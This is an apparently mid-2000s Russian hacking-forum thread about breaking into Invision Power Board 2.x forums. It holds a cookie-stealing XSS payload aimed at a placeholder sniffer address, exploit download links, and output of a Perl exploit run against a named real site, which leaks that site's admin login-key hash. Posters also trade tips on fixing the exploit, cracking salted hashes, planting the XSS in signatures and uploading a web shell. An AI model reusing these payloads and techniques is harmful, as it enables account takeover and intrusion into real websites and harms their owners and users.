Что это такое? И с чем его едят? Можите по этому движку что нить дать?

1.сплойт от http://rst.void.ru
2.xss wj.

1.сплойт от http://rst.void.ru
2.xss wj.

Дай по конкретней ссылку :))
и что нужно говорят исправить в сплоите?

что тебе ещё давать???????? и так всё понятно!
1.зайди на вышк указанный сайт => Exploits => там ищи сплойты для IPB 2.0.1
2.воспользуйся поиском по форуму! тут уже не раз давали прямую ссылку на тему, но попробуй сам поискать...

что тебе ещё давать???????? и так всё понятно!
1.зайди на вышк указанный сайт => Exploits => там ищи сплойты для IPB 2.0.1
2.воспользуйся поиском по форуму! тут уже не раз давали прямую ссылку на тему, но попробуй сам поискать...

Да я понимаю но в этом сплоите есть ошибка??? какая она

Я бы дал такую (http://yandex.ru) ссылку. Там всё есть. А от собственного нежелания искать (между прочим, за 10 минут можно управиться) нечего напрягать других.

Код XSS
http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="Адрес_Сниффера?"+document.cookie)

Сплоит качай тут (Исправленный)
www.barsik.jino-net.ru/ipb.rar

Сплоит удалю сегодня вечером так что качай :)

Код XSS
http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="Адрес_Сниффера?"+document.cookie)

Сплоит качай тут (Исправленный)
www.barsik.jino-net.ru/ipb.rar

Сплоит удалю сегодня вечером так что качай :)

Код XXS как? куда? его применить?

Ipb ни с чем не едят блин..
да и вообще иди выучи что такое хсс и потом спрашивай.....

Код Xss, который тебе дали нужно отредактировать под свой или ачатовский, или любой другой сниффер, а потом запостить всё это на форуме или втыкнуть в подпись и ждать пока придут куки.....
Спрашивай, что не понятно, если сам знаю, то объясню-)))) И не забывай про репутацию...;-)

C:\>c:\perl\sploit\ipb.pl www.himclan.com /forum/ 1 1
[~] SERVER : www.himclan.com
[~] PATH : /forum/
[~] MEMBER ID : 1
[~] TARGET : 1 - IPB 2.*
[~] SEARCHING PASSWORD ... [|]Can't use an undefined value as a symbol reference
at c:\perl\sploit\ipb.pl line 134.

сплоит вот что пишет что значит?

Это значит, что в сплойте есть ошибка в строке 134.

Это значит, что в сплойте есть ошибка в строке 134.
Нет не обязательно.
У меня такое бывает довольно часто. А раза с пятого хэшик получаю. Хотя может ошибка и другая была :)

C:\>c:\perl\sploit\ipb.pl www.himclan.com /forum/ 1 1
[~] SERVER : www.himclan.com
[~] PATH : /forum/
[~] MEMBER ID : 1
[~] TARGET : 1 - IPB 2.*
[~] SEARCHING PASSWORD ... [|]Can't use an undefined value as a symbol reference
at c:\perl\sploit\ipb.pl line 134.
попробуй написать
site.ru /forum/ 1 0

Кстати у меня тоже 2 раза выскакивала ошибка в строке 134. Баг видимо в сплойте.

Кстати у меня тоже 2 раза выскакивала ошибка в строке 134. Баг видимо в сплойте.
Не знаю, у меня ни разу такого не было.

Это значит что сплоит получает в ответ символ, который не может корректно обработать, зависит не от сплоита, а от ответа сервера который бомбишь.

Да все работает...
Вот вам Хэш Админа

C:\Tools\Программы>perl ipb.pl www.himclan.com /forum/ 1 1
[~] SERVER : www.himclan.com
[~] PATH : /forum/
[~] MEMBER ID : 1
[~] TARGET : 1 - IPB 2.*
[~] SEARCHING PASSWORD ... [ DONE ]

MEMBER ID : 1
MEMBER_LOGIN_KEY : b65e23ca7ec5961b2c6710237c988e48

Не забудьте про репутацию :))
PS На форуме присутствует также XSS Баг :))

Эге...
Могу еще один сплоит посоветовать, если найдешь...
ipb_skides.pl
Классная тема... Нужная, найдешь береги, не давай никому...
:)

На Ачате есть этот сплоит. Вроде он :)
http://forum.antichat.ru/threadnav8206-3-10.html

Не совсем тот, там есть отличия.
Не буду их тут приводить там защита "от дурака" =)
И тот, что ты указал, немного переделанный...
Ну там хоть защиту не сняли...
А кто снимал так заведомо не правильно =)

А что нить еще можите надыбть с этого форума? )) И ссылочку на прогу что хэш ломает не подскажите?

Чет немогу этот хэш ломануть ((

Версия форума 2.*.*!
Ты с солью расшифровываешь?

Если даже и без соли то пасс не так скоро появится... Возможно только через неделю расшифровки получишь его :(

Господа!
Есть вопрос по поводу сплоита
который выдает вместо хеша нули...
Я сам в перле вообще не силен, а сплоит мне давали по-знакомству, уже рабочий...
Вчера, ставил себе Вынды и потер его случаем...
Помогите кто может....
-----
ЗЫ. Не обижайтесь плз за вопрос...

Господа!
Есть вопрос по поводу сплоита
который выдает вместо хеша нули...
Я сам в перле вообще не силен, а сплоит мне давали по-знакомству, уже рабочий...
Вчера, ставил себе Вынды и потер его случаем...
Помогите кто может....
-----
ЗЫ. Не обижайтесь плз за вопрос...
Если ты говоришь про сплойт r57ipb2, то замени строку под номером 90 на $allchar .= chr($char);
Если помог, то не забывай про репутацию ;-) Другие бы в поиск послали=))))

Неа не то...
Эту ашипку я и сам нашел и понял...
Другой сплоит, то о чем мы с тобой спорили...
# Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org
Смотри на http://de-face.jino-net.ru/ipbnull.txt

Другой сплоит, то о чем мы с тобой спорили...
Я пользуюсь сплойтом от rst, он на мой взгляд лучше, хотя они используют одну и туже уязвимость.... Щас посмотрел на тот, на который ты мне ссылку дал..... ну во-первых last там нужно вообще убрать и изменить строку, где log in написано.....
Хотя я тебе советую пользоваться сплойтом от rst! ИМХО Его править намного легче=)) А так разницы ни какой.

Я пользуюсь сплойтом от rst, он на мой взгляд лучше, хотя они используют одну и туже уязвимость.... Щас посмотрел на тот, на который ты мне ссылку дал..... ну во-первых last там нужно вообще убрать и изменить строку, где log in написано.....
Хотя я тебе советую пользоваться сплойтом от rst! ИМХО Его править намного легче=)) А так разницы ни какой.

Хех... Мучался искал где там last, не нашол вупор...
Пользоваться rstipb2.pl там бессмысленно выдает [Failed].
Ну с Log In я понял.
Спасиб ==> +

Если выдаёт [Failed], то значит, что форум скорее всего пропатчен.... Ты ещё попробуй=) Просто если от rst сплойт выдаёт фэйлд, то и тот тоже не будет хэш выдавать...
да не за что-)
Если хочешь, то я тебе могу на мыло скинуть рабочий сплойт r57ipb2=) Или тут выложить, как хочешь, если надо.

ShturmBanFurrer
Дай ссылку на форум

Да если 2* то мне кажется тебе бес толку ломать сайт если 1.* то ещё есть возможность. Но а так же можно просто куки у админа украсть потом подставить потом зайти в админку залить шелл и дело сделано.

Да если 2* то мне кажется тебе бес толку ломать сайт если 1.* то ещё есть возможность. Но а так же можно просто куки у админа украсть потом подставить потом зайти в админку залить шелл и дело сделано.
Если ты меняешь куки, то ты зайдешь только до учетки админа, в админку тебе не попасть, там стоит еще одна проверка на пароль.
Или если я не прав раскажи как.

Но а так же можно просто куки у админа украсть потом подставить потом зайти в админку залить шелл и дело сделано.
Тут идёт речь об IPB, следовательно хэш расшифровать полюбому надо, если хочешь в админку. А просто подставка кук не поможет.

ShturmBanFurrer
Дай ссылку на форум

Не сильно хочу что бы его изуродовали...
Если кого интересует, то стучите в АСЮ 33-83-53-5
Там поговорим. Расскажу реакцию сайта на хсс. Не стоит тут флудить.
Может я чем отблагодарю, если мои возможности совпадут с вашими желаниями.

Не стоит тут флудить
Вот с этим я согласен=)))